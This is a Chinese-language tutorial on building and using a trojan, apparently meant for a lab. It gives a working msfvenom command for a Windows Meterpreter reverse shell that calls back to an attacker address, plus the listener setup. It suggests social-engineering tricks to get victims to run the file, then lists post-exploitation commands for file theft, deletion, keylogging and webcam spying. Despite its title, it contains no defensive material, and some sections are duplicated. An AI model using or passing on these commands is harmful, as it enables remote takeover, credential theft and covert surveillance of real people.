木马攻击与防御

01 木马概述

• 木马通常称为黑客程序恶意代码也称为特洛伊木马。
• 基于远程控制的黑客工具

02 木马的组成

• 客户端程序(生成木马)
  客户端程序黑客方的控制台,它负责远程遥控指挥

• 服务器端程序(被攻击方)
  服务器端程序即是木马程序,它被隐藏安装在被攻击(受害)方的电脑上,目标主机也称为肉鸡

03 木马的危害

• 盗取用户信息
  如:网游账户、网银信息、QQ密码等
• 占用系统资源,降低电脑效能
• 将本机作为工具来攻击其他设备,也称为肉鸡

04 利用MSFvenom制作木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.232.140  lport=8888 -f exe -o qwe.exe

-p payload
-f 生成文件的后缀名
-o 生成的文件名称

05 开启针对 reverse_ tcp监听得端口

攻击方开启4444窗口
msfconsole
 use exploit/multi/handler
 set payload windows/meterpreter/reverse_tcp
 set lhost 192.168.232.140
 set lport 8888
 exploit/run

06 客户运行木马

此处需要运用到社会工程学,如软件绑定伪装、邮件伪装、木马网页、二维码等

将生成的木马传到被攻击的主机，并点击运行

07 木马反弹shell成功

08 操作

• 查看系统信息

sysinfo
ipconfig
id
whoami

• 切换路径与浏览内容

pwd
dir
cd 
dir 路径
download 文件名
upload 文件名

• 删除文件

rm 路径 文件
rmdir 路径 文件夹

• 键盘记录

screenshot
ps | grep notepad
migrate PID
run post/windows/capture/keylog_recorder

• 摄像头监控

help webcam
webcam_snap
webcam_stream

• 关机

shutdown

• 摄像头监控

help webcam
webcam_snap
webcam_stream

• 关机

shutdown

免责声明

本文档供学习，请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责！